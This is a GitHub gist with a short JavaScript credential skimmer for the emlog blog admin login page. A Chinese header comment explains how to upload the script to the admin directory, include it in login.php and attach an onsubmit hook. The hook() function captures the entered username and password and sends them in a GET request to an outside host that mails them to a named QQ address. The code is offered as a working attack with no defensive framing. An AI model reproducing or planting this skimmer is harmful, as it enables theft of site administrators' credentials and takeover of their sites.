Created
February 24, 2014 13:38
-
-
Save Q2h1Cg/9188568 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/* | |
Author: Chu | |
很简单,就是劫持登录表单。 | |
1. 把 js 传到/admin/views/js/ 目录下 | |
2. 后台登录页面/admin/views/login.php 中添加<script src="./views/js/emlog.js"></script> 引入 js。 | |
form 表单中,添加 onsubmit 事件,onsubmit="hook()" | |
*/ | |
function createXHR () { | |
var xmlhttp; | |
if (window.XMLHttpRequest) { | |
// code for IE7+, Firefox, Chrome, Opera, Safari | |
xmlhttp=new XMLHttpRequest(); | |
} | |
else { | |
// code for IE6, IE5 | |
xmlhttp=new ActiveXObject("Microsoft.XMLHTTP"); | |
} | |
return xmlhttp; | |
} | |
function get (xhr, url) { | |
xhr.open("GET", url, false); | |
xhr.send(); | |
return xhr.responseText; | |
} | |
function hook () { | |
var username = document.getElementById('user').value; | |
var password = document.getElementById('pw').value; | |
var mailto = encodeURIComponent("63370505@qq.com"); | |
var title = encodeURIComponent("\u6697\u6708\u7684\u5bc6\u7801\u6765\u4e86"); | |
var content = encodeURIComponent("\u5e10\u53f7\uff1a"+username+"\n\u5bc6\u7801\u662f\uff1a"+password); | |
var xhr = createXHR(); | |
var url = "http://chuhades.sinaapp.com/message.php?mailto="+mailto+"&title="+title+"&content="+content; | |
get(xhr, url); | |
} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment